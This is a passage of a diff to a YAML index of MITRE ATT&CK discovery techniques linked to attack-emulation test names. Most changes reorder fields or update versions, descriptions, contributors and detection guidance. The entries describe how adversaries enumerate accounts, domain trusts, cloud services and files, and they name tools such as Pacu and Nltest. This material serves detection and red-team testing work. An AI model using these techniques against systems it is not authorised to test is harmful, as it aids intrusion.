can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- x_mitre_impact_type:
- - Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Network protocol analysis
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
discovery:
T1087:
@@ -35213,22 +36188,7 @@ discovery:
phase_name: discovery
modified: '2020-03-26T15:27:59.127Z'
created: '2017-05-31T21:31:06.988Z'
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Azure activity logs
- - Office 365 account logs
- - API monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
@@ -35239,7 +36199,22 @@ discovery:
- GCP
- Azure
- SaaS
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Office 365 account logs
+ - API monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ - Travis Smith, Tripwire
+ x_mitre_version: '2.1'
atomic_tests: []
T1010:
technique:
@@ -35261,21 +36236,21 @@ discovery:
phase_name: discovery
modified: '2020-03-26T15:44:27.068Z'
created: '2017-05-31T21:30:24.512Z'
- x_mitre_version: '1.1'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - macOS
+ - Windows
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.1'
identifier: T1010
atomic_tests:
- name: List Process Main Windows - C# .NET
@@ -35333,25 +36308,25 @@ discovery:
phase_name: discovery
modified: '2020-03-26T16:06:07.367Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Mike Kemmerer
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
x_mitre_data_sources:
- API monitoring
- File monitoring
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Mike Kemmerer
+ x_mitre_version: '1.0'
identifier: T1217
atomic_tests:
- name: List Mozilla Firefox Bookmark Database Files on Linux
@@ -35496,6 +36471,19 @@ discovery:
phase_name: discovery
modified: '2020-03-13T20:05:15.448Z'
created: '2020-02-21T21:08:36.570Z'
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Office 365 account logs
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- AWS
- GCP
@@ -35503,19 +36491,6 @@ discovery:
- Office 365
- Azure AD
- SaaS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information.
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Azure activity logs
- - Office 365 account logs
- - Process monitoring
- - Process command-line parameters
atomic_tests: []
T1069.003:
technique:
@@ -35554,23 +36529,23 @@ discovery:
phase_name: discovery
modified: '2020-03-12T19:25:12.782Z'
created: '2020-02-21T21:15:33.222Z'
- x_mitre_platforms:
- - Office 365
- - Azure AD
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- Azure activity logs
- Office 365 account logs
- API monitoring
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Office 365
+ - Azure AD
atomic_tests: []
T1538:
technique:
@@ -35599,54 +36574,78 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2019-10-23T14:19:37.289Z'
+ modified: '2020-07-14T19:19:00.966Z'
created: '2019-08-30T18:11:24.582Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: 'Monitor account activity logs to see actions performed and
+ activity associated with the cloud service management console. Some cloud
+ providers, such as AWS, provide distinct log events for login attempts to
+ the management console.(Citation: AWS Console Sign-in Events)'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Azure activity logs
+ - Stackdriver logs
+ - AWS CloudTrail logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
x_mitre_platforms:
- AWS
- GCP
- Azure
- Azure AD
- Office 365
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Office 365 audit logs
- - Azure activity logs
- - Stackdriver logs
- - AWS CloudTrail logs
- x_mitre_detection: 'Monitor account activity logs to see actions performed and
- activity associated with the cloud service management console. Some cloud
- providers, such as AWS, provide distinct log events for login attempts to
- the management console.(Citation: AWS Console Sign-in Events)'
atomic_tests: []
T1526:
technique:
+ created: '2019-08-30T13:01:10.120Z'
+ modified: '2020-06-23T14:31:41.758Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
+ description: "An adversary may attempt to enumerate the cloud services running
+ on a system after gaining access. These methods can differ from platform-as-a-service
+ (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS).
+ Many services exist throughout the various cloud providers and can include
+ Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions,
+ Azure AD, etc. \n\nAdversaries may attempt to discover information about the
+ services enabled throughout the environment. Azure tools and APIs, such as
+ the Azure AD Graph API and Azure Resource Manager API, can enumerate resources
+ and services, including applications, management groups, resources and policy
+ definitions, and their relationships that are accessible by an identity.(Citation:
+ Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter
+ is an open source tool for enumerating and constructing a graph for Azure
+ resources and services, and Pacu is an open source AWS exploitation framework
+ that supports several methods for discovering cloud services.(Citation: Azure
+ - Stormspotter)(Citation: GitHub Pacu)"
+ name: Cloud Service Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- - external_id: T1526
- source_name: mitre-attack
+ - source_name: mitre-attack
+ external_id: T1526
url: https://attack.mitre.org/techniques/T1526
+ - source_name: Azure - Resource Manager API
+ url: https://docs.microsoft.com/en-us/rest/api/resources/
+ description: Microsoft. (2019, May 20). Azure Resource Manager. Retrieved
+ June 17, 2020.
+ - source_name: Azure AD Graph API
+ url: https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview
+ description: Microsoft. (2016, March 26). Operations overview | Graph API
+ concepts. Retrieved June 18, 2020.
+ - source_name: Azure - Stormspotter
+ url: https://github.com/Azure/Stormspotter
+ description: Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June
+ 17, 2020.
- source_name: GitHub Pacu
url: https://github.com/RhinoSecurityLabs/pacu
description: Rhino Security Labs. (2019, August 22). Pacu. Retrieved October
17, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Service Discovery
- description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ depending on if it's platform-as-a-service (PaaS), infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many different services exist throughout the various cloud providers and can include continuous integration and continuous delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment.
-
- Pacu, an open source AWS exploitation framework, supports several methods for discovering cloud services.(Citation: GitHub Pacu)
- id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2019-10-17T19:11:02.353Z'
- created: '2019-08-30T13:01:10.120Z'
x_mitre_platforms:
- AWS
- GCP
@@ -35655,10 +36654,11 @@ discovery:
- Office 365
- SaaS
x_mitre_contributors:
+ - Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
x_mitre_permissions_required:
- User
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- Azure activity logs
- Stackdriver logs
@@ -35667,6 +36667,7 @@ discovery:
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1087.002:
technique:
@@ -35692,21 +36693,21 @@ discovery:
phase_name: discovery
modified: '2020-03-26T13:42:34.402Z'
created: '2020-02-21T21:08:26.480Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1087.002
atomic_tests:
- name: Enumerate all accounts (Domain)
@@ -35814,22 +36815,22 @@ discovery:
phase_name: discovery
modified: '2020-03-12T19:07:53.043Z'
created: '2020-02-21T21:15:06.561Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1069.002
atomic_tests:
- name: Basic Permission Groups Discovery Windows (Domain)
@@ -35951,24 +36952,12 @@ discovery:
'
T1482:
technique:
- id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
- description: 'Adversaries may attempt to gather information on domain trust
- relationships that may be used to identify lateral movement opportunities
- in Windows multi-domain/forest environments. Domain trusts provide a mechanism
- for a domain to allow access to resources based on the authentication procedures
- of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users
- of the trusted domain to access resources in the trusting domain. The information
- discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005),
- [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation:
- AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain
- trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call,
- .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
- [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
- to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- name: Domain Trust Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2019-02-14T16:15:05.974Z'
+ modified: '2020-03-26T16:13:21.085Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1482
@@ -35994,12 +36983,24 @@ discovery:
url: https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships
description: Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved
February 14, 2019.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T16:13:21.085Z'
- created: '2019-02-14T16:15:05.974Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Trust Discovery
+ description: 'Adversaries may attempt to gather information on domain trust
+ relationships that may be used to identify lateral movement opportunities
+ in Windows multi-domain/forest environments. Domain trusts provide a mechanism
+ for a domain to allow access to resources based on the authentication procedures
+ of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users
+ of the trusted domain to access resources in the trusting domain. The information
+ discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005),
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation:
+ AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain
+ trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call,
+ .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
+ [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
+ to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
+ id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
x_mitre_version: '1.1'
x_mitre_permissions_required:
- User
@@ -36111,26 +37112,37 @@ discovery:
phase_name: discovery
modified: '2020-03-26T15:27:58.933Z'
created: '2020-02-21T21:08:33.237Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- Office 365 account logs
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1083:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:31:04.710Z'
+ modified: '2020-03-26T17:18:36.857Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: File and Directory Discovery
+ description: |-
+ Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
external_references:
- source_name: mitre-attack
external_id: T1083
@@ -36139,19 +37151,8 @@ discovery:
description: Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers.
Retrieved February 2, 2016.
source_name: Windows Commands JPCERT
- description: |-
- Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
- name: File and Directory Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T17:18:36.857Z'
- created: '2017-05-31T21:31:04.710Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_system_requirements:
- Some folders may require Administrator, SYSTEM or specific user depending
on permission levels and access controls
@@ -36281,22 +37282,22 @@ discovery:
phase_name: discovery
modified: '2020-03-20T19:39:59.544Z'
created: '2020-02-21T21:07:55.393Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1087.001
atomic_tests:
- name: Enumerate all accounts (Local)
@@ -36511,22 +37512,22 @@ discovery:
phase_name: discovery
modified: '2020-03-26T17:48:27.871Z'
created: '2020-03-12T19:29:21.013Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1069.001
atomic_tests:
- name: Permission Groups Discovery (Local)
@@ -36569,15 +37570,15 @@ discovery:
name: powershell
T1046:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1046
- external_id: T1046
- - external_id: CAPEC-300
- source_name: capec
- url: https://capec.mitre.org/data/definitions/300.html
+ created: '2017-05-31T21:30:43.915Z'
+ modified: '2020-03-11T19:55:53.828Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Service Scanning
description: "Adversaries may attempt to get a listing of services running on
remote hosts, including those that may be vulnerable to remote software exploitation.
Methods to acquire this information include port scans and vulnerability scans
@@ -36586,15 +37587,15 @@ discovery:
Additionally, if the cloud environment is connected to a on-premises environment,
adversaries may be able to identify services running on non-cloud systems
as well."
- name: Network Service Scanning
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-11T19:55:53.828Z'
- created: '2017-05-31T21:30:43.915Z'
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1046
+ external_id: T1046
+ - external_id: CAPEC-300
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/300.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- Windows
@@ -36750,18 +37751,11 @@ discovery:
phase_name: discovery
modified: '2020-03-15T00:59:10.149Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Network protocol analysis
- - Process use of network
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- macOS
- Windows
@@ -36769,11 +37763,18 @@ discovery:
- GCP
- Azure
- Linux
- x_mitre_permissions_required:
- - User
- x_mitre_contributors:
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
